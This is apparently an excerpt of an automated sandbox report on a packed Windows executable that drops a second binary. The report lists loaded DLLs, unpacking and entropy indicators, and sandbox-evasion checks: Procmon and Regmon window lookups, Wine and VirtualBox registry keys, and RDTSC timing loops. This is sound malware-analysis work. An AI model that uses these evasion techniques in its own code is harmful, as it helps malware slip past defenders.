          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeSection loaded: sspicli.dllJump to behavior
          Source: file.exeStatic file information: File size 2994688 > 1048576
          Source: file.exeStatic PE information: Raw size of pbfjgcaa is bigger than: 0x100000 < 0x2afc00
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 7V52BG1QZHX6WU0LEYA.exe, 00000003.00000003.1618894342.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, 7V52BG1QZHX6WU0LEYA.exe, 00000003.00000002.1751970734.0000000000812000.00000040.00000001.01000000.00000006.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f90000.0.unpack :EW;.rsrc :W;.idata :W;pbfjgcaa:EW;kavtkaqy:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;pbfjgcaa:EW;kavtkaqy:EW;.taggant:EW;
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeUnpacked PE file: 3.2.7V52BG1QZHX6WU0LEYA.exe.810000.0.unpack :EW;.rsrc:W;.idata :W;bvojmhev:EW;wyxhjguh:EW;.taggant:EW; vs :ER;.rsrc:W;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
          Source: 7V52BG1QZHX6WU0LEYA.exe.0.drStatic PE information: real checksum: 0x2b7bd1 should be: 0x2b0e94
          Source: file.exeStatic PE information: real checksum: 0x2df644 should be: 0x2e2efc
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .rsrc
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name: pbfjgcaa
          Source: file.exeStatic PE information: section name: kavtkaqy
          Source: file.exeStatic PE information: section name: .taggant
          Source: 7V52BG1QZHX6WU0LEYA.exe.0.drStatic PE information: section name:
          Source: 7V52BG1QZHX6WU0LEYA.exe.0.drStatic PE information: section name: .idata
          Source: 7V52BG1QZHX6WU0LEYA.exe.0.drStatic PE information: section name: bvojmhev
          Source: 7V52BG1QZHX6WU0LEYA.exe.0.drStatic PE information: section name: wyxhjguh
          Source: 7V52BG1QZHX6WU0LEYA.exe.0.drStatic PE information: section name: .taggant
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564F44 push ebp; retf 0_3_01564F45
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564F44 push ebp; retf 0_3_01564F45
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01561748 pushad ; ret 0_3_01561819
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01561748 pushad ; ret 0_3_01561819
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156A161 push ss; retf 0_3_0156A162
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156A161 push ss; retf 0_3_0156A162
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156A161 push ss; retf 0_3_0156A162
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564E84 push esi; ret 0_3_01564E85
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564E84 push esi; ret 0_3_01564E85
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564F44 push ebp; retf 0_3_01564F45
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564F44 push ebp; retf 0_3_01564F45
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01561748 pushad ; ret 0_3_01561819
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01561748 pushad ; ret 0_3_01561819
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156A161 push ss; retf 0_3_0156A162
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156A161 push ss; retf 0_3_0156A162
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156A161 push ss; retf 0_3_0156A162
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564E84 push esi; ret 0_3_01564E85
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564E84 push esi; ret 0_3_01564E85
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156B8BA push edx; ret 0_3_0156B8CA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564F44 push ebp; retf 0_3_01564F45
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564F44 push ebp; retf 0_3_01564F45
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01561748 pushad ; ret 0_3_01561819
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01561748 pushad ; ret 0_3_01561819
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156A161 push ss; retf 0_3_0156A162
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156A161 push ss; retf 0_3_0156A162
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156A161 push ss; retf 0_3_0156A162
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564E84 push esi; ret 0_3_01564E85
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01564E84 push esi; ret 0_3_01564E85
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeCode function: 3_2_009BD180 push edx; mov dword ptr [esp], eax3_2_009BD1BB
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeCode function: 3_2_009BD180 push 0C827603h; mov dword ptr [esp], edx3_2_009BD20F
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeCode function: 3_2_009BD180 push 6C90F0B8h; mov dword ptr [esp], eax3_2_009BD22D
          Source: file.exeStatic PE information: section name: entropy: 7.976762047296123
          Source: 7V52BG1QZHX6WU0LEYA.exe.0.drStatic PE information: section name: entropy: 7.801669300081099
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeJump to dropped file

          Boot Survival

          barindex
          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
          Tries to detect sandboxes / dynamic malware analysis system (registry check)
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BA1A second address: 116BA1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116B065 second address: 116B081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007F4F296427B4h 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edi 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116B21C second address: 116B220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CC9B second address: 116CCD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4F296427ACh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F4F296427ACh 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CCD3 second address: 116CCD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CCD9 second address: 116CCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CCDD second address: 116CD41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 adc edx, 009585E1h 0x0000000f jbe 00007F4F28CDCB6Ah 0x00000015 mov si, 31FEh 0x00000019 push 00000000h 0x0000001b mov edi, dword ptr [ebp+122D1D71h] 0x00000021 call 00007F4F28CDCB69h 0x00000026 push ebx 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a pop edx 0x0000002b pop ebx 0x0000002c push eax 0x0000002d jnl 00007F4F28CDCB78h 0x00000033 mov eax, dword ptr [esp+04h] 0x00000037 pushad 0x00000038 jmp 00007F4F28CDCB73h 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CD41 second address: 116CD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jmp 00007F4F296427B2h 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CD6B second address: 116CD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CD74 second address: 116CDBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b mov dl, 1Dh 0x0000000d sub dword ptr [ebp+122DB84Ch], ecx 0x00000013 push 00000003h 0x00000015 call 00007F4F296427AEh 0x0000001a movsx edx, si 0x0000001d pop edx 0x0000001e push 00000000h 0x00000020 and ch, 00000075h 0x00000023 push 00000003h 0x00000025 mov ecx, dword ptr [ebp+122D39BAh] 0x0000002b mov cx, di 0x0000002e push 76FE7899h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jbe 00007F4F296427A6h 0x0000003c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CE44 second address: 116CE49 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CE49 second address: 116CED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D3299h], ecx 0x00000010 and di, A89Eh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F4F296427A8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 and esi, 6761D2C3h 0x00000037 mov edi, dword ptr [ebp+122D39FAh] 0x0000003d call 00007F4F296427A9h 0x00000042 push esi 0x00000043 jmp 00007F4F296427B7h 0x00000048 pop esi 0x00000049 push eax 0x0000004a pushad 0x0000004b pushad 0x0000004c jmp 00007F4F296427B6h 0x00000051 jp 00007F4F296427A6h 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CED7 second address: 116CEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CEDB second address: 116CFB6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4F296427A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnc 00007F4F296427B2h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 ja 00007F4F296427A8h 0x0000001e push eax 0x0000001f pop eax 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 jmp 00007F4F296427B7h 0x0000002a pop eax 0x0000002b mov dword ptr [ebp+122D2C28h], ecx 0x00000031 push 00000003h 0x00000033 xor dword ptr [ebp+122D32A6h], edx 0x00000039 push 00000000h 0x0000003b call 00007F4F296427AFh 0x00000040 jmp 00007F4F296427B2h 0x00000045 pop edi 0x00000046 jmp 00007F4F296427AFh 0x0000004b push 00000003h 0x0000004d mov ecx, 43638B54h 0x00000052 push AF5351EBh 0x00000057 jno 00007F4F296427BEh 0x0000005d xor dword ptr [esp], 6F5351EBh 0x00000064 lea ebx, dword ptr [ebp+12451AE9h] 0x0000006a jmp 00007F4F296427B3h 0x0000006f push eax 0x00000070 pushad 0x00000071 pushad 0x00000072 pushad 0x00000073 popad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CFB6 second address: 116CFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118EE72 second address: 118EE78 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118CB9F second address: 118CBAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jbe 00007F4F28CDCB66h 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D091 second address: 118D0AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F4F296427B0h 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D37A second address: 118D392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4F28CDCB6Fh 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D392 second address: 118D3D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F4F296427A6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F4F296427B2h 0x00000019 jmp 00007F4F296427B2h 0x0000001e je 00007F4F296427AEh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D67C second address: 118D6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB77h 0x00000007 push ecx 0x00000008 jmp 00007F4F28CDCB78h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D811 second address: 118D82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F296427B7h 0x00000009 popad 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D82D second address: 118D841 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4F28CDCB6Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D841 second address: 118D845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D9A1 second address: 118D9AB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F28CDCB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DB17 second address: 118DB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DCC2 second address: 118DCDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F28CDCB79h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DFAE second address: 118DFB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DFB6 second address: 118DFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118E93B second address: 118E94F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118EC7B second address: 118EC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118EC81 second address: 118EC89 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118EC89 second address: 118ECC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jbe 00007F4F28CDCB66h 0x0000000b popad 0x0000000c jmp 00007F4F28CDCB74h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F4F28CDCB74h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119174C second address: 1191752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191752 second address: 1191757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191757 second address: 1191761 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4F296427ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191EE8 second address: 1191EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191EEC second address: 1191F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191F03 second address: 1191F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192FFF second address: 119300D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F4F296427A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
